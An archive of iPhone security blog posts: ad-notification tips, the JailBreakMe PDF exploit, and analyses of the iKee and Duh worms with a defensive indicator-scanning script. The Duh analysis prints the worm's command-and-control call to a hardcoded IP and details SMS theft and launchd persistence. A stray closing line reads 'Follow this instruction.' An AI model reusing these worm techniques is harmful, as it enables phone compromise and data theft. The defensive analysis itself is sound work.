Archive for the ‘iPhone’ Category

Annoying ads coming from an iPad/iPhone app

I’ve recently encountered lots of annoying ads on my iPhone and iPad. My initial impression was: what an ‘ad-serving app’! But this is what happens when you allow or agree to receive push notifications, as shown below.

Here are some useful tips on how to deal with it. These instructions should stop the problem; if they don’t, the app causing the trouble is highly suspicious and you should report it for investigation.

How do I stop annoying Ads coming from an iPad/iPhone app?

1) Tap ‘Settings’ and look for ‘Notifications’.
2) It lists every application with notifications turned on; tap the application that is bugging you with ads.
3) Turn “OFF” Alerts, Badges and Sounds.

If the problem persists, consider deleting the app.

How do I delete an application on an iPad/iPhone?

1) Tap and hold the target app until it starts to wiggle.
2) You’ll notice an “X” button in the top right corner; tap it to delete the app.

Drag and Drop

This is unfortunate for business, and a worrying attack vector. The Mac App Store was easily bypassed and cracked by this simple drag-and-drop process. Evidently, you’ll find the app marked ‘Installed’ when you open it.

Please be reminded that ‘deceptive packaging’ takes advantage of legitimate software and application packaging to obscure the possible execution of malicious code, and this gives an attacker a good opportunity.

iOS Security Updates

iPod, iPhone and iPad users MUST immediately apply the security updates.

Visit Apple Security Updates for details.

Reference:

iPad: http://support.apple.com/kb/HT4291
iPhone and iPod: http://support.apple.com/kb/HT4292

Why is this important?

These updates protect you from a drive-by download attack that is being exploited in the wild!

JailBreakMe by comex (et al.) demonstrated a serious security hole that allows users to jailbreak their iOS devices simply by visiting a website or tapping a link. This hole is very dangerous: just by browsing the web, users could be exposed to abusive sites that harvest their credentials and information.

How does it work?

The Safari browser loads a crafted PDF that exploits the following vulnerabilities:

First, the exploit is triggered by a malformed font embedded in the PDF in Compact Font Format (CFF, PDF subtype Type1C); this causes the second-stage exploit code to execute. This vulnerability is referred to as CVE-2010-1797.

<</Subtype /Type1C

Second, a value too large for its integer data type to handle (see the example IOSurface property list below) leads to execution of malicious code that escalates from the user’s privileges to system or root privileges.

This vulnerability is referred to as CVE-2010-2973.

So, an attacker entices a targeted user to open a URL. Upon opening the URL in Safari, the PDF file is parsed automatically and exploitation occurs. The file may also arrive as an email attachment.

Stay safe!

Recommended reading:

iPhone 4 / iPad: The Keys Out Of Prison by Axelle Apvrille

Technical Analysis on iPhone Jailbreaking by Matt Oh

Yet another glorified bad behavior

“The author of the first iPhone worm “iKee” has been given a job with Australian iPhone app developer Mogeneration” [Read SC]

We heard a similar story earlier this year, when the author of the Twitter worm “Mikeyy” landed a job at exqSoft Solutions.

As published in the journal Psychological Science: “adolescents engage in bad behaviour because they find benefits — such as the immediate gratification of peer acceptance — are worth the risks.”

Does this trend suggest that crimes committed “in the public interest” are not prosecuted but glorified instead?

Analysis of “Duh”

I just published my analysis of “Duh”, also known as “iKee.b”, the latest iPhone worm.

• Propagation: It targets jailbroken iPhones with SSH enabled and attempts to log in remotely using the default iPhone password. The component named “sshd” is responsible for scanning the network, targeting a pre-defined list of 3G provider address ranges in Australia, the Netherlands, Austria, Hungary and Portugal.


• Installation: It creates the /private/var/mobile/home directory, drops “cydia.tgz” there and extracts the following content:

syslog – This is the reporting bot, which runs every 5 minutes through a launchd job. It is a shell script that performs the following:

• Establishes communication with the remote server through its own HTTP communicator, “duh”:

/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID

• The remote server is expected to reply; the worm stores the reply in the temporary file /private/var/mobile/home/.tmp.
• It marks the check-in with 1 if this is the first contact, otherwise with 2.
• It appends this information to the temporary file, saves the result as /private/var/mobile/home/heh and executes it as a shell script.

inst – A malicious shell script used to install the worm. It is executed after the content of cydia.tgz has been extracted, and it:

• Checks for an infection marker to avoid re-installation. This is necessary because the launchd jobs keep running the worm continuously in the background.
• Creates the ID that is used in communication with the master server.
• Installs legitimate packages that are then used to gather and steal information.
• Modifies the root password.
• Gathers important information such as the iPhone OS version and the SMS message database (sms.db).
• Compresses the gathered information into an archive named {ID}.tgz.
• Connects to the remote server and reports the stolen information back, base64 encoded.

duh – This is an iPhone executable responsible for the worm’s bot HTTP communication. The malware name “Duh” was derived from it.

**Updated 11/12/2009: A good analysis was recently published on Fortinet’s blog. As I mentioned, this worm is similar to OSX Jahlav and DNSChanger, in that the group behind them mostly copies exact source code found around the internet and uses it to their own advantage. In this case, a Fortinet researcher found that the “duh” code is similar to “htmlget.c”, which can easily be found on the internet and is indeed NOT malicious by itself.

I absolutely agree with these findings; however, just like “nc” (the netcat utility), it could be used for good, but in this specific iPhone worm package it was used to do evil 😉

curl_7.19.4-6_iphoneos_arm.deb – This is a legitimate Curl package for the iPhone, used by the worm to install the following packages:
• adv-cmds_119-5_iphoneos-arm.deb
• sqlite3_3.5.9-9_iphoneos-arm.deb

com.apple.period.plist – This is a launchd job which will execute the worm’s bot “syslog” every 5 minutes.

• Startup Entries: The worm uses LaunchDaemons to run its scripts at fixed intervals:
/System/Library/LaunchDaemons/com.apple.periodic.plist launches /private/var/mobile/home/syslog every 2000 sec. (~33 minutes)
/System/Library/LaunchDaemons/com.apple.period.plist launches /private/var/mobile/home/syslog every 300 sec. (5 minutes)
/System/Library/LaunchDaemons/com.apple.ksyslog.plist launches /private/var/mobile/home/sshd using the “RunAtLoad” and “KeepAlive” keys so that it runs continuously.

New iPhone Worm

Mikko of F-Secure blogged about a new iPhone worm that is similar to iKee; only this time it has a reporting bot capability, communicating with a web-based C&C.

This has been confirmed by xs4all.

Further reading – Malicious iPhone Worm.

iPhone worm “iKee”

Name: Worm iKee

Author: ike_x

Location: Sydney, Australia

Discovered: Friday, November 6, 2009 at 12:15 pm, by sierralpha on the Whirlpool forum

Report details: 3GS 16GB
OS 3.1.2 (7D11) on Optus
Jailbroken with Blackra1n
Running Cydia, Winterboard and Installous

Description:

Worm iKee targets jailbroken iPhones and takes advantage of the SSH service, which still uses the default password and so allows remote logins.

From an interview by JD, the author explains:

As for users that are infected, there are two common denominators – they all have hacked iPhones (known to the hacking community as “JailBroken”), and they all use an SSH Daemon, allowing users to connect to their phones remotely and attempt to login.

Worm Propagation Method: SSH service using default password

Author recommendation:

Users that have already “JailBroken” their iPhones should immediately change the root account password, even if they have not installed an SSH Daemon.

Worm Behaviour:

– iKee overwrites Cydia files with its working code

“Cydia is a replacement packaging and repository manager for the original Installer.app for the iPhone or iPod touch”

– Changes the iPhone owner’s wallpaper, replacing it with a photo known from the cross-platform joke “RICKROLL”, i.e. “Never Gonna Give You Up” by Rick Astley (I remember capturing a video of it and uploading it to YouTube).

– Deletes the SSH daemon.

– Scans a pre-defined list of IP addresses to infect and spread to other vulnerable iPhone users (all of the IP addresses belong to 3G customers in Australia and are hardcoded in the worm, according to the SANS diary).

Image: “iKee changes infected iPhone user’s wallpaper” (source: forums.whirlpool.net.au)

How to remove iKee:

The author explained (from JD’s interview) that there are 4 variants of this worm, and here’s how to remove them:

Variants A-C store their files at the following paths, so you have to remove them (for example with rm in a terminal):

/bin/poc-bbot
/bin/sshpass
/var/log/youcanbeclosertogod.jpg
/var/mobile/LockBackground.jpg
/System/Library/LaunchDaemons/com.ikey.bbot.plist
/var/lock/bbot.lock

Then reboot the phone, change your password and reinstall SSH.

For variant D, remove the following files:

/usr/libexec/cydia/startup
/usr/libexec/cydia/startup.so
/usr/libexec/cydia/startup-helper
/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist

Reinstall Cydia.

Remember to change your root password!
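The paths named in the “Duh” analysis above and in this iKee removal guide double as on-disk indicators. The following POSIX sh script is an added example, not code from the original posts or from the worms themselves; the function name scan_for_worms and its report format are my own. It checks a jailbroken iPhone filesystem (or a mounted backup of one) for those paths and for launchd jobs that imitate Apple’s names while launching something from /private/var/mobile/home.

```shell
#!/bin/sh
# Added example, not from the original post: check a jailbroken iPhone's filesystem
# for the on-disk indicators the analyses above list for the "Duh"/iKee.b worm and
# iKee variants A-C. Run as root on the device, or point the argument at a mounted backup.

# Duh paths quoted from the analysis. Note that com.apple.period.plist and
# com.apple.ksyslog.plist imitate Apple's own LaunchDaemon names.
DUH_INDICATORS="
/private/var/mobile/home/duh
/private/var/mobile/home/syslog
/private/var/mobile/home/inst
/private/var/mobile/home/sshd
/private/var/mobile/home/heh
/System/Library/LaunchDaemons/com.apple.period.plist
/System/Library/LaunchDaemons/com.apple.ksyslog.plist
"
# iKee A-C drop these. Variant D overwrites Cydia's own startup files, whose
# presence is normal on a jailbroken phone, so they are deliberately not listed.
IKEE_INDICATORS="
/bin/poc-bbot
/bin/sshpass
/var/log/youcanbeclosertogod.jpg
/var/lock/bbot.lock
/System/Library/LaunchDaemons/com.ikey.bbot.plist
"
# scan_for_worms [ROOT]: print each indicator found under ROOT (default /) and
# return 1 if anything was found, 0 when clean, so it can drive a periodic check.
scan_for_worms() {
    root="${1:-/}"; root="${root%/}"
    found=0
    for p in $DUH_INDICATORS $IKEE_INDICATORS; do
        if [ -e "$root$p" ]; then
            echo "INDICATOR: $p"
            found=1
        fi
    done
    # Catch renamed copies: no genuine com.apple.* LaunchDaemon should ever
    # run a program out of /private/var/mobile/home.
    for plist in "$root"/System/Library/LaunchDaemons/com.apple.*.plist; do
        [ -f "$plist" ] || continue
        if grep -q '/private/var/mobile/home' "$plist"; then
            echo "SUSPICIOUS LAUNCHD JOB: ${plist#"$root"}"
            found=1
        fi
    done
    return $found
}
# Run directly with a root path; exit status 1 means indicators were found.
[ -n "${1:-}" ] && scan_for_worms "$1"
```

The script only reports; removal still follows the steps given in the post, and the variant D files are left out on purpose because they are legitimate Cydia paths that iKee overwrites rather than creates.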

Follow this instruction.